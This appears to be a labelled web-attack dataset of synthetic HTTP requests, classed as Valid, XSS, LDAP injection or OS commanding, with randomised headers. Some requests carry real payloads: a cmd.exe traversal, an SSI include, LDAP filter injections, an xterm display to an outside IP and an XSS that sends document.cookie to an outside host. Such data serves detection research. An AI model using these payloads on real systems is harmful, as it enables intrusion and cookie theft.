~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

FNjAKaOhavingaY=itihlIe/&olmlvls=0950&t7=[n3io e%winnt4stjPl%iq&EeLif=tewj06&hanhos=iTl)e9ooaneez&eEOeuseetyen2=tVDtjbm.&pa3esyg=<!--  #include    virtual="d:\windows\autoexec.bat"  -->&HS5Zt-=6609413&TNAv0EzjVOj.=~pdti+inputttLme

End - Id: 40430
Start - Id: 38560
class: LdapInjection
GET /QPpVE/tdH4M_fQ2Jz45kqR/nF6D/urcbAUZbO8/bootJCxzqt5Z/hetitPnvsasYrn/sY@Po/ec3C2splzBhMHOrhG/ijotbEEsalO9Ik/xdjynZNJFrms.cgi?cnluadsn=tsAetqRHA0e8ee&roDssekepenw=0034%29%28%26%28objectClass%3D3a28%29%28%7C%28sn+++%3D++6i%29%28cn%3Deber++J*%29%29&ogeLisr=or+eenNfrsnullx2dltc1&ulhhiwFt=ntaeeoees&Ls9E.sFhfpassthru=d1esxt5mfsoatahtja&ng3Erm=8720&prns=ejtwget HTTP/1.1
Host: www.se4o6m1bp.ch
Connection: 0asagshh
Accept: */*;q=0.8
Accept-Charset: windows-1255, windows-1250
Accept-Encoding: compress;q=0.1, gzip, identity;q=0.6
Accept-Language: *
Cache-Control: max-age=2
Client-ip: 40.99.33.206
Cookie: md=r0oo;meEI=83070;iacvemaneet9Amc=nmeb9openexecllhug mar
Cookie2: $Version="165"
Date: Sun, 25 Nov 07 03:39:21 GMT
ETag: W/"@tyb3ncQYBWwihXP"
Expect: sz4c0e
From: Mi7ssg@viIni5i6.de
If-Modified-Since: Mon, 17 Jan 05 03:53:45 CET
If-Unmodified-Since: Thu, 19 Jun 08 15:18:15 CET
If-Match: *
If-None-Match: "TLY7LRv2Atgq5Ufdw"
If-Range: "A-jDpJflhN@CSYCe92s"
Max-Forwards: 68
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: ohceo eebrth=greetthm
Authorization: A7onf enat8x=eoebe
Range: -956,35-
Referer: http://www.acldec.cz/U6qre2e/ou3omao/En6joeU/Heet.wav
TE: gzip
Trailer: Cache-Control
User-Agent: tHrpeeanrl/5.6
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: HTTP/9.5 www.wodw5.tiff, 6.6 www.oeat.gif
Transfer-Encoding: identity
Upgrade: sngbx/2.1, isltnt/7.9
Warning: 417 www.racf.css "lane" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38560
Start - Id: 47224
class: XSS
GET /z2WXf/sez/Wizdhh/hraoPotgps2rrA/esMeB4e/_U6otpasswdKwtmpdocument.aspx?xzzme=448&resaklot=laAio+style%3Dleft%3Aexpression%28alert++%28Otr.rnei%29%29 HTTP/1.0
Host: 131.165.21.192
Connection: nhtkR0M
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=01166
Client-ip: 179.225.149.173
Cookie: fliirtqasnayhsa=iwgett;priod=74029900
Cookie2: $Version="537"
Date: Mon, 21 Jan 08 22:02:58 CET
ETag: "1GrtRjyzVjvgoMOl2e"
Expect: h5ltje
From: nsseehjh@a5ejeaendE.biz
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Wed, 27 Apr 05 07:36:30 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 03 Aug 07 12:18:32 CET
Max-Forwards: 99
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest username="pwrd"
Range: 7379-
Referer: http://bsgeo.st/ht0oUsd/Rktewm.swf
TE: gzip;q=0.1,trailers,gzip;q=0.4
Trailer: TE
User-Agent: y9SBXQ http://www.lyddea.it
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 286x017
Via: 2.7 69.148.8.10
Transfer-Encoding: gzip
Upgrade: rako/1.9, sgo/1.5, 5edi/5.4, t0a/2.0
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 102.233.207.222
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47224
Start - Id: 43862
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.0
Host: 101.0.253.161
Connection: keep-alive
Accept: image/jpeg, audio/*;q=0.7, image/jpeg
Accept-Charset: *
Accept-Encoding: identity, identity, identity, deflate;q=0.9, gzip;q=0.5
Accept-Language: 1cRu-m9dqiihp
Cache-Control: only-if-cached
Client-ip: 165.236.64.199
Cookie: deahOtuIelL=sngmhdr;n2d=efs.Ho.frOTK;rensaytiinyhaga=em4epsTcufRae;h2eUimhkeh=sa%I;relerBkczmou=onl;b09EY292=5Dehtaccesf:md
Cookie2: $Version="8"
Date: Mon, 02 Feb 09 10:10:51 CET
ETag: "HEbQ33-SkVt2EnOI24b"
Expect: 100-continue
From: nxa0tn0@Cododus.net
If-Modified-Since: Mon, 19 Apr 04 12:20:52 GMT
If-Unmodified-Since: Thu, 31 May 07 08:10:28 GMT
If-Match: *
If-None-Match: "ZJLZhg2yTBia3IW"
If-Range: Fri, 25 Aug 06 12:17:59 UTC
Max-Forwards: 005
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="tRstaerb"
Authorization: Digest qop=tTfrtNsH
Range: 91796-,027282-114595
Referer: /seyNoteg/drhiRurt/vtseorao/eedmske.aspx
TE: trailers
Trailer: User-Agent
User-Agent: ahid2Di
UA-CPU: PowerPC
UA-Disp: 191,2261,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 629x1097
Via: gZ1naf/1.2 www.whufar.js
Transfer-Encoding: tdfaN
Upgrade: 0a7on5/8.8, emazee/1.9, 1hodgr/0.0, auiinp/3.7
Warning: 298 94.217.207.58 "Eds2iystmt" 
X-Forwarded-For: 69.99.5.109
X-Serial-Number: 77798884304573720348
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 43862
Start - Id: 17171
class: Valid
GET /rJtloToBKlTd./50ti4bkmnyawqhsba/eQuJ/l8b7xig/7W@Kp.swf? HTTP/1.1
Host: 10.88.213.43:0
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, identity, gzip, gzip, deflate;q=0.4
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 199.180.99.118
Cookie: GeM2aeeqo=rq2vtrhhmimxtdrr;VrLI=nr1weastwRp
Cookie2: $Version="31"
Date: Fri, 27 Jun 08 03:55:14 CET
ETag: "zhQch-fDvy2Xl-ugZ1"
Expect: 100-continue
From: tti3@d7huEaimh.net
If-Modified-Since: Sun, 01 Jul 07 18:25:12 UTC
If-Unmodified-Since: Fri, 08 Feb 08 07:17:27 CET
If-Match: *
If-None-Match: "6FUNH4v7AJgtkIM"
If-Range: *
Max-Forwards: 0
MIME-Version: 3.2
Pragma: f0ghbeEi='hic9eaee'
Proxy-Authorization: Basic RW9keVA6c29waXNoZWI=
Authorization: Digest algorithm=tuoqNg
Range: -785968,-02
Referer: http://www.fythtoAe.uk/gybzN3ui/tNEhnnd5/uak8/acesnttU.gz
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: issgis7me
UA-CPU: StrongARM
UA-Disp: 150,488,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 674x357
Via: 8eteir/8.9 234.190.186.64:92, HTTP/5.7 80.201.249.219
Transfer-Encoding: ylme; aabnifo=ek8dpi
Upgrade: wbigqt/6.4, hv08se/7.5, ses/3.0, iei/9.4, n6vl/4.7
Warning: 805 www.tiToe.js:8 "nemt6tdhmtanm" "Sun, 01 Feb 04 01:16:58 CET"
X-Forwarded-For: 181.160.254.196
X-Serial-Number: 80895113
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17171
Start - Id: 36830
class: OsCommanding
GET /h54OxfRl-1ccE2-/e2zLAr/mnRstuh/04Fwgetqo/oftrdtuasogeil/wZ4Z.vX9usraMxp_q/nlHcopy/d9.png?etobseigce=eXXVmMYarSIA&ittek9eitpiaO6n=exec%26&lAtmEiietc=975643&taS3tre=iTT&CFenlg=k+&irDtszetol=h%40%2Feunc%2Br%24&vQ3yE9dhku1=injsgrt9a&dio7md0aNlot=90490&bqsuzn0enrtssS=edannshsk&ohrohndsla8b=%5Crxterm++++-display++112.74.251.180%3A0.0&ieHt4t=w6ZqCGI%40t&QQ3A9YXupdateWL=E6&d004nTHeoat9eq=36199476&fCeReAwto9az=44531 HTTP/1.1
Host: 98.217.137.170
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-874;q=0.4, iso-8859-8-i;q=0.8, windows-1258, koi8-r;q=0.4, hz-gb-2312
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: gertyOn=dethNyeh
Date: Thu, 04 Aug 05 04:23:12 GMT
If-Match: *
Max-Forwards: 1616
Pragma: no-cache
Authorization: NTLM YW5vb3RlY2xuc2lFdXJHaWhhU21ubm5zc3V1ZW9zeXJ0ZWUwU2R3U2FuaWhmcw==
Referer: http://3trcsuaE.net/f2elpt.tar
User-Agent: Mozilla/8.2 (Windows; U; Win 9x 7.7; en-Eg; rv:2.8.7) Gecko/57897709
UA-CPU: PowerPC
Via: 3.0 www.iae9xnml.tiff:1

null

End - Id: 36830
Start - Id: 21970
class: Valid
GET /r_/pheuehe6duEeCacujeg/-n/fexeccmz.html?tsuo=404&sna=ha1ntts&4a0odz7m=23830&h0fanonie9EfqtR=rdooezb00%27winntw&eQh3cusyF=tve%25e++ebscriptphpf&KJkGphpV=ondLs0tieerudu&kTemho=erv&erAl=iio4Deaaiv&itotI75tms=4197201&m5etc6t=0cxOsatVWhebn&thtaccesz2A90=6&logMXXhtpass=h HTTP/1.0
Host: 249.206.170.59
Connection: close
Accept: application/zip;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: min-fresh=8
Client-ip: 3.169.52.148
Cookie: wacSM-olocationgXLf=lBcR.Fsj1Z;srewcecD3=08410251;eNizutrQK=sSKtfgb;rhNooaPhxfaeO=iepwilyforms8i;2ejs=T)g;too=74269
Cookie2: $Version="56"
Date: Thu, 06 Nov 08 16:41:05 CET
ETag: "ZmUAKvksf.o2w3cQjoy"
Expect: neoot=oinv6tgt
From: zeose@esnekaphed.be
If-Modified-Since: Mon, 10 Dec 07 12:56:55 GMT
If-Unmodified-Since: Fri, 20 Nov 09 23:21:05 CET
If-Match: "8A5ZTIeiz1Tcr.3pBXB"
If-None-Match: *
If-Range: *
Max-Forwards: 0864
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic Y3VkUzpocm5n
Authorization: aeah nhsAbEn=ehsaeoCl
Range: 2-874,8-,3113-623962
Referer: /u90Epld/hheeahfo/9ars.wav
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: Expect
User-Agent: n4eAw4 (fDk4EbA)
UA-CPU: MIPS
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 044x0436
Via: 3.9 www.resekIc.tiff:28
Transfer-Encoding: compress
Upgrade: fysst/0.3
Warning: 225 83.153.240.145 "z2mns9" "Wed, 03 Nov 04 24:19:07 UTC"
X-Forwarded-For: 198.11.68.176
X-Serial-Number: 09176432061314
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21970
Start - Id: 30277
class: Valid
GET /Udeleteusr93/h_n@hvMCnZe_jZFuK/dSrwKUuiJEka17fR7Y/silh2.asmx?r1eG=d7euWPeeOjqdrIGoO&DlyVtwindow.openkupdateS3KA=n2a&ehtaohstaIxdn=iTSenrehnid&uijoji9lnriyzo=2&udleia=lhnNmocha5na9n&qrLAaCnsrE=243&SQHnCejoYe=2&foflR9A=hio+k&wejjNigter=a5oeaeimaraeen7nf9&hm8er=8S%280b2slvar+37&shpe2ptrihovtx=6847 HTTP/1.0
Host: 81.24.104.140
Connection: keep-alive
Accept: application/*;q=0.6, video/mpeg;q=0.7
Accept-Charset: iso-8859-2, iso-2022-jp;q=0.1, windows-1254;q=0.3
Accept-Encoding: deflate;q=0.2, compress;q=0.5, compress, gzip;q=0.8, gzip;q=0.5
Accept-Language: coax-qhaebeh;q=0.7, db-lDefh1h
Cache-Control: max-stale=4
Client-ip: 161.143.138.79
Cookie: 1Rp-yuWI1nph-=47opzeet6;wezgrsXdeolua=osock_streami79o(;tziIr17ocog==voeakx Nehsucopy ode;-eiIKf=el
Cookie2: $Version="5"
Date: Mon, 30 Jan 06 21:03:41 CET
ETag: W/"AagKIIrYXAoxG-KnCw"
Expect: 100-continue
From: iaDu8xrn@BrjrrRgg.gov
If-Modified-Since: Sun, 07 Nov 04 16:24:04 GMT
If-Unmodified-Since: Tue, 04 Oct 05 21:25:50 UTC
If-Match: "I9S4KDmN0-HmKpp9f"
If-None-Match: *
If-Range: Thu, 18 Jan 07 05:45:06 CET
Max-Forwards: 863
MIME-Version: 4.6
Pragma: t='amels'
Proxy-Authorization: Digest qop=auth
Authorization: eebstr 7jf6ri=lghsTw
Range: 52-
Referer: /noos0nd2/yeOostt/ecafsgRt.pdf
TE: gzip,deflate;q=0.8
Trailer: Trailer
User-Agent: Mozilla/6.0 (compatible; MSIE 6.6; Linux i386; Ohtia7eayi; dmlnOiEXdi)
UA-CPU: MIPS
UA-Disp: 790,434,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 9593x7407
Via: 4.7 44.129.0.125, tii/0.4 106.152.64.194, 8.3 70.88.116.182
Transfer-Encoding: 9tUa; wtrene=tttop
Upgrade: fu6eud/5.9, gsnxrd/6.7
Warning: 817 93.133.40.203 "t2ar7ldre" 
X-Forwarded-For: 102.149.83.187
X-Serial-Number: 686350212460
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30277
Start - Id: 37860
class: LdapInjection
GET /e9ehosfaejxAus/tNDCje-zO1hD5PfZ.aspx?OohbaEvNtee12nb=ghiNidch4+%3BzfnE&eeia=WTidheatanmaaiep&vceiol5wnaph=%29+%28++%7C+%28displayName%3Dhad*%29++%28name%3Dhad*++++%29%28+++mail%3Dhad*%29&ftpQexecO=u&enh=%29%25&dLekipindz=06812&e2=hs&e1te8dei=155521&rT5yadxsaueisow=4&ixdtli=ctee&n5tBeoSBugUqs=AiuSee6ei&nal=+from+Tanph-7Xuu1dhnhd4&sneOeta=c+ifselect%3Ageevalisoewhfsrrn&O4rkvbin=4stsG2AI HTTP/1.0
Host: www.tmjn.biz
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: w-thEoaoyO;q=0.4, eee-omanmai;q=0.0, maH-raetea4e, ehdhot-cd5ra8t;q=0.7
Cache-Control: only-if-cached
Client-ip: 39.35.248.126
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="01"
Date: Mon, 02 Aug 04 16:51:48 GMT
ETag: "QM2AbarDrp.Gbbqs7pd"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Tue, 23 Mar 04 21:15:01 UTC
If-Unmodified-Since: Sat, 27 Jun 09 07:00:07 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 05 Jun 04 15:11:28 CET
Max-Forwards: 118
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest username="otjbsa"
Authorization: NTLM ZXRldGViaWF4bW54ZUhMZWZodGFhdmlXZEliZXR1c3RlZUQ=
Range: 3-43,-454,28574-
Referer: /eT2y/1nrsote.txt
TE: trailers,chunked;q=0.7,trailers
Trailer: Referer
User-Agent: pr8uYeart/7.9.4
UA-CPU: x86
UA-Disp: 8628,0806,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 649x451
Via: HTTP/0.8 www.eestn.gif:23756, mii/6.0 www.cyerja.js
Transfer-Encoding: compress
Upgrade: obeThi/2.4, ems/4.7
Warning: 340 www.t8Tb0.gif "i52D9owoehei2ibsei" "Thu, 30 Dec 04 01:19:45 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 37860
Start - Id: 33699
class: Valid
POST /v6optZtmpEU1PH/au/tytleidOmttmlnyelsat/DOr/lit2Co5esce2mR/ab5sEoheys/oga/_yg/iSkvlLd/sabnlIhumro/tHyh7onltanexiakedb/26-tRhc9BeZlH0gs7.jpg? HTTP/1.0
Content-Length: 155
Content-Language: Apem,v,r
Content-Encoding: identity
Content-Location: /aosasae/zIraam/yezaa.sh
Content-MD5: c2E2ZUkxZWVhN3A1ZFVudA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Nov 09 17:35:08 UTC
Last-Modified: Thu, 31 Jul 08 16:05:57 UTC
Host: 241.93.219.194:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.8
Accept-Language: p-Oo, Aeaa-nhdo;q=0.7, ta-d9nwst
Cache-Control: min-fresh=732
Client-ip: 188.178.199.117
Cookie: ohenpudkm=9bgsound3o
Cookie2: $Version="27"
Date: Wed, 10 Sep 08 19:38:23 GMT
ETag: W/"OuCB_nSlEjkR3sVs"
Expect: o6Ofdort
From: eu4d2je@tmo8qmlil.org
If-Modified-Since: Sat, 26 Sep 09 08:29:04 UTC
If-Unmodified-Since: Fri, 16 Jun 06 17:12:40 GMT
If-Match: "Yd.S3dztggeY6L4V"
If-None-Match: "MALzlNbovNTllAc4uS1"
If-Range: *
Max-Forwards: 0
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=ubkliie
Authorization: NTLM Y2tpZXRvYWJldGZvd3JhdDZwdG9BZDBlYU9sa0hlbmVsd1Rub2Ftam5lQ2F0
Range: -803,-861752
Referer: http://aeuoi2ee.fr/taoeyuw/ur8ikpuv/sn8oflea/eDu6edH/as2u.css
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/8.2 (X11; U; Linux i386 4.3; iE-nm; rv:8.7.7) Gecko/73877914
UA-CPU: PowerPC
UA-Disp: 9133,083,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 603x625
Via: rs1o0i/9.7 40.195.12.30, 5.8 www.awEl.jpg
Transfer-Encoding: deflate
Upgrade: nNNbft/3.3, Asmzu/4.2, arUHa4/8.0
Warning: 255 20.208.58.243 "jso9tss" "Tue, 24 Oct 06 11:42:11 CET"
X-Forwarded-For: 134.44.228.236
X-Serial-Number: 695598853636
----: -------------------------
~~~~~: ~~~~~~~~~~~~~

rthHsiiq0nh=5925613&die9h=h/5du&andtew=~nyElmeta44ishutdowno&lead=6477&i9t8a8mcuhpewa=q35ezreplacehome6nhr2se8HW%a&nefdhe3au=344&etairirpndlaqe6=2065

End - Id: 33699
Start - Id: 21
class: Valid
GET /w.Uf5JwRVDFBS_arlHS/idarshhe/mu/rPJNJbh6jyp4UlXpdy/eD3tO4u.kVpNAo6j/FLceRgformxp_2epLzv6/W@jxml96-Izp/aowH6PnHMdp-YasO2.asp?4MvHXOJMoL2=tq+2rena&tgm=SX&6D=u1sqni2sh0oc&tl7=9782449&a6ncpE=tmpltctg%7CaCd%29group+by&mslh=sErteneee6ohgxws&fhvhpl0nn=ealf3Sae&8z@aYh.mwa=ili07Ryeeqeb&Hsrliteit5=06547&nnshu=684&1alr=rxO&OxOEpy-YltH7=drop&whm83=z7union&QdSXi3=1 HTTP/1.1
Host: 180.33.185.26
Connection: sgo4
Accept: video/*;q=0.3, audio/*
Accept-Charset: windows-874;q=0.2, iso-8859-8;q=0.1, x-mac-greek;q=0.6, utf-7;q=0.0
Accept-Encoding: 
Accept-Language: bisact2-sos8
Cache-Control: max-stale=298
Client-ip: 198.201.173.41
Cookie: i5uditwC=4r9XmC;eHsh5Lh=2;tNtD0vn0mols=73g7;temep=emE~;tEqajrmobtenoi=~d;eaytsOepg=73828178
Cookie2: $Version="52"
Date: Mon, 18 Oct 04 16:08:06 CET
ETag: W/"1hX6T0c-CbBwPLabz"
Expect: 100-continue
From: rtt4u@rffaotB9S0.ch
If-Modified-Since: Sat, 26 Aug 06 06:04:38 UTC
If-Unmodified-Since: Wed, 11 Jun 08 02:48:36 GMT
If-Match: "q.4hO5T.h7vocxB"
If-None-Match: "NQ40hdzMS@ClRJgPuDH"
If-Range: Mon, 29 May 06 21:00:32 GMT
Max-Forwards: 26
MIME-Version: 6.7
Pragma: 0ra='al'
Proxy-Authorization: Digest response="9A4225299AdfbC29Fc0D3BFfa178C4E8"
Authorization: Basic cUJpc2E6dDVvMQ==
Range: -923117,3050-297658
Referer: http://5eiicel.biz/meql1hA/5nTKc/o7Te.bin
TE: gzip;q=0.1,trailers
Trailer: From
User-Agent: smaetrY (elh1rmx; 7uGF.lYe)
UA-CPU: PowerPC
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2292x8708
Via: FTP/8.9 www.ihro.shtml
Transfer-Encoding: deflate
Upgrade: sroo/1.1
Warning: 927 www.uEPrbtt.js:5292 "ywqs8f" 
X-Forwarded-For: 20.155.227.227
X-Serial-Number: 579346705
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 21
Start - Id: 16818
class: Valid
GET /PreplacePc@eJGsAk/EIaousf/e2TH/th_x3z84kCen1/uvonHe.css?h0nusoIbhto=86059051&smtntqeeaxri9=8jfgSHQz&oseie=fpI&waonl=50405&08osde5ttes=h5nsFiXs5x&7d9yUYBRO=Agk&haegtvbsgEsnh=+znsuf HTTP/1.0
Host: www.acaeMloXT5.uk
Connection: close
Accept: image/*;q=0.0, image/*, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: owW-t;q=0.9, tn-4oazo7ag, bnee-7sEOlg;q=0.6, ennphwo-i1e
Cache-Control: no-cache
Client-ip: 219.189.119.78
Cookie: VstdinYW=8559;etdishvattht=xnU5a-G18;T02KOIrV=E46taa;lrciOdntpe2ea=0083357
Cookie2: $Version="584"
Date: Mon, 14 Sep 09 08:04:14 CET
ETag: "itjXOwKf@iA@iiML87g"
Expect: 100-continue
From: eoPu@ohbrao.biz
If-Modified-Since: Thu, 10 Feb 05 03:58:51 CET
If-Unmodified-Since: Sat, 23 Dec 06 22:03:56 GMT
If-Match: "d-BVB@mSVF5K-xk"
If-None-Match: "uCZfhzAZxMaLuFoAC18V"
If-Range: Sun, 10 Sep 06 18:13:48 GMT
Max-Forwards: 5433
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Digest uri=/0naYTtga/isasndt/dhsaNs/gnre.pl
Authorization: Digest algorithm=ccne1hn
Range: -24853
Referer: http://www.fssrx.gov/llOt.tiff
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: eO7ttno (fMl_7wkQX; vbesg5EO6t; no5u-T)
UA-CPU: MIPS
UA-Disp: 952,004,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 916x0533
Via: 4.1 76.125.89.183, dcuui/5.0 237.242.224.131
Transfer-Encoding: identity
Upgrade: ehb/5.0, ddtr/2.0, tCi/5.5, Scstne/5.2, totwta/1.3
Warning: 241 226.111.88.138 "blstama" "Mon, 10 Jan 05 20:15:12 UTC"
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 60090044663
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16818
Start - Id: 47086
class: XSS
GET /sde4cn/dg9Rewna3ransseittrV/xjs/dhntEtln/shi92tlet7dwtiiae/mpenJez/e20qzHF/5erEitblcEh0/b6epdiqromitEzgencu/gEFnetcatcnJAQ.nsf?etandiEe1m=gde&h0aupqtl=077&jTsJibx4=iTG&sehftets=h%40U%24st+r&iludGshdfu6=63&h1W6=telnetn&qBfusrwV_PR=slath&Cntctn=76988&I29pmnfvYt.E=eTiwrfG+wi6dR&iruciaeeOrrx=325055355&ee=%3C%21--+--+--%3E%3Cscript+%3E%5Bwindow.open%28%27http%3A%2F%2F84.56.146.85%2Falri.php4%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E%3C%21--+--+--%3E HTTP/1.1
Host: 42.48.11.49
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: xt5a4l-o, oio-sReo;q=0.1, ueey3iat-rdws, rrvodaa-5pohtdh2;q=0.8
Cache-Control: no-cache
Client-ip: 4.100.87.145
Cookie: ightNeedzele=k;ntteh2n=794;OEQlQM=n8pelShoreersaeRs;est=h ;4JO2=tQaMot-zsENP;qWa6wwbtlaa=148071
Cookie2: $Version="41"
Date: Mon, 01 Dec 08 18:37:45 CET
ETag: W/"5flgWqTfDcqEkoyRjTt"
Expect: 100-continue
From: en3oiyg@ysel.org
If-Modified-Since: Wed, 16 Jun 04 06:03:19 CET
If-Unmodified-Since: Sat, 30 Oct 04 02:04:04 GMT
If-Match: *
If-None-Match: "V9.i.iQXnMQ7R7p"
If-Range: Mon, 06 Nov 06 18:40:39 UTC
Max-Forwards: 567
MIME-Version: 8.0
Pragma: esannB=eoOt9ke
Proxy-Authorization: NTLM RG1mM3NqbEVxZ29jZW1hdHJsOG9lYWlzZ2ZnY3R3YmhlT2VhZWh4MmU=
Authorization: NTLM cmxpZWdvZGlkbHRkdGhyYWk1ZGl3TW1udmdNajd4dG50Yk8=
Range: -409656
Referer: /toet8.ace
TE: trailers
Trailer: Warning
User-Agent: ettpid0ry (uS_XAr)
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 389x1282
Via: HTTP/0.1 198.232.0.144, 3yha2/7.3 www.srss.css
Transfer-Encoding: s90rlc
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 097 105.248.59.21 "trypi" "Sat, 04 Jun 05 05:58:55 UTC"
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 60697232
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47086
Start - Id: 19577
class: Valid
GET /0ycLRcL9T7t/Gimeeee/Re0ai66whorpmb/seiriiowrNiayrrnptd/@sR/hOGbphWLL/wmqpxs3tednettgtLe/iEdrzsoitN.css?eieh=2&uttszbmobh4mu=efo6&inoin2at=yuosmnssio+sR&llayew=a&EultldaEehai=+&05Vh=lomq&ArNrbietim4=025&nrsse=oscycinc&uhetlsheobV=document&alekoesCxv=ct&2ap=Qgs+h2&cwas7=071439&YncN=82529&enodsmsnenait=814 HTTP/1.1
Host: www.hOitA8egcl.net
Connection: close
Accept: audio/*, video/mpeg;q=0.1
Accept-Charset: cp-936, x-mac-greek;q=0.5, windows-1255;q=0.9, x-mac-chinesetrad
Accept-Encoding: *;q=0.2
Accept-Language: psaraeN-iesk;q=0.3, otn-aapurff8;q=0.9, oaet-H
Cache-Control: no-cache
Client-ip: 74.39.86.157
Cookie: alEdk0S=59238353;tstNoHu=aad8sm
Cookie2: $Version="632"
Date: Mon, 04 Oct 04 01:01:58 UTC
ETag: W/"SXup_SmNwWOnFcvZiBQ"
Expect: rrltvn
From: ogeen@6fmx.ch
If-Modified-Since: Mon, 21 Feb 05 06:58:45 GMT
If-Unmodified-Since: Wed, 13 May 09 09:29:57 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 30 Oct 07 12:37:12 CET
Max-Forwards: 2036
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest response="26f0Ddd9c3EF6aBbfeE8e5AF980aDe9d"
Authorization: Basic ZXZ3cnJveHc6SHRpdHJo
Range: 187147-0990,76-,-590377
Referer: http://www.ed7e.com/cdWeIdoo/stwu/rhtbo.exe
TE: deflate,trailers
Trailer: Pragma
User-Agent: mvrc55eEhoyds8itoi6j
UA-CPU: MIPS
UA-Disp: 187,0883,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 4605x2042
Via: HTTP/6.0 www.elezd.jpeg, t2q/8.1 www.nrde8uhl.shtml:3, ins0h/4.9 www.ang0.css
Transfer-Encoding: gzip
Upgrade: tecthp/7.8
Warning: 408 115.192.90.4 "lvsu" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19577
Start - Id: 23700
class: Valid
GET /ic/eeesiilamllt/wh3nuee9udhoE/Eid/r72.BcfvJj/PmUQPHo/tayunmvoihf6rke/raKCfIP9olTiq/taercn/sNNne/o_Y/oDl6.cfm?idmaezwryL=+0rewtIr&jien6els=u4xatMxGcpKY&ksguiaEaat43ief=sKJQ%403_NLige&y9Wxifiu=t%24pleo%3E%3A%26&vbscriptzhvZwp-1Q=mhulX-N%40FBRh HTTP/1.1
Host: www.funnaue.de
Connection: keep-alive
Accept: application/postscript;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 103.148.150.147
Cookie: replaceXIchildoPV3=Re
Cookie2: $Version="7"
Date: Sat, 20 Sep 08 15:53:03 CET
ETag: W/"VgZhKD9NhHdEZ3Nql8O"
Expect: 100-continue
From: aoma9pu@etChsK.com
If-Modified-Since: Mon, 12 Apr 10 11:50:37 CET
If-Unmodified-Since: Thu, 31 Dec 09 03:28:28 GMT
